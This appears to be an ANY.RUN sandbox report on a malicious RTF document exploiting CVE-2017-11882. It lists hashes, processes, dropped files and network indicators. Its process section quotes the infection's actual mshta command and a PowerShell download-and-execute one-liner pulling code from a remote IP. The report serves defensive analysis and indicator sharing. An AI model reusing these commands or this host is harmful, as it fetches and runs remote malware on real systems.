analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

MV TONG SHUN.doc

Full analysis: https://app.any.run/tasks/800bc0f3-5c4d-4fce-ad80-0da9cc688756
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: October 14, 2019, 08:39:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
exploit
CVE-2017-11882
trojan
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

DF698925DB142720CF084D04147DB4AA

SHA1:

18F9799E33EA07BB601CCC2859749AA49E5502C9

SHA256:

33CFB0DB524658139AC16254863AD48C9F4783D7FF0FEC2E88F2B1EF227249CD

SSDEEP:

768:qxrBqbeW6HHkXzD7p2og7PPPPPhPPPPPgPPPPP6IozoR8oVojrc9YU:qqbxqoWPcKU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 4088)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 4088)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 4088)
    • PowerShell script executed

      • powershell.exe (PID: 2772)
    • Executed via WMI

      • powershell.exe (PID: 2772)
    • Connects to unusual port

      • MsHTa.exe (PID: 1848)
      • powershell.exe (PID: 2772)
    • Creates files in the user directory

      • powershell.exe (PID: 2772)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 920)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 920)
    • Application was crashed

      • EQNEDT32.EXE (PID: 4088)
    • Reads internet explorer settings

      • MsHTa.exe (PID: 1848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: FireSecIT
LastModifiedBy: FireSecIT
CreateDate: 2019:10:07 21:04:00
ModifyDate: 2019:10:07 21:04:00
RevisionNumber: 1
TotalEditTime: -
Pages: 1
Words: -
Characters: -
CharactersWithSpaces: -
InternalVersionNumber: 95
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\MV TONG SHUN.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4088"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1848MsHTa http://103.207.38.15:1010/hta &AAAAAAA CC:\Windows\system32\MsHTa.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2772powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://103.207.38.15:1010/get'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 888
Read events
1 097
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA5DF.tmp.cvr
MD5:
SHA256:
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E9E20F7FR27BXVDNT8XM.temp
MD5:
SHA256:
920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ TONG SHUN.doc.rtfpgc
MD5:CC6FC16EA433B583D07A2BAF805FA3A8
SHA256:5A437B1B7EE252190793E1D1EBE9C685B5CF3E54CBFEFBF56CC69443B424FEEC
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
1848MsHTa.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1]html
MD5:854D62EBD759ABA3A3702F52702920CF
SHA256:5DBA474DF76213C76B281C389BBE5899B92DD7FB99521E4014A40C60A781ED04
920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8032A407895D8E9D2BB6589223B4888A
SHA256:534549629E0A7B0918B121CD41380D0B5E05083A9E1D1ECB2D231626D89AFA74
2772powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b427.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90BC6701.wmfwmf
MD5:A53FF3B2B74B0493CD2DD5351BCB2760
SHA256:AC5F55A119B8894F347A6E85328D4A1E7BA350E0D4EA98CE1D3B2F95FAECB5F2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2772
powershell.exe
GET
103.207.38.15:1010
http://103.207.38.15:1010/get
VN
malicious
1848
MsHTa.exe
GET
200
103.207.38.15:1010
http://103.207.38.15:1010/hta
VN
html
2.44 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2772
powershell.exe
103.207.38.15:1010
VNPT Corp
VN
malicious
1848
MsHTa.exe
103.207.38.15:1010
VNPT Corp
VN
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
1848
MsHTa.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2772
powershell.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
2772
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Script/Oneeva.A!ml
2772
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
2 ETPRO signatures available at the full report
No debug info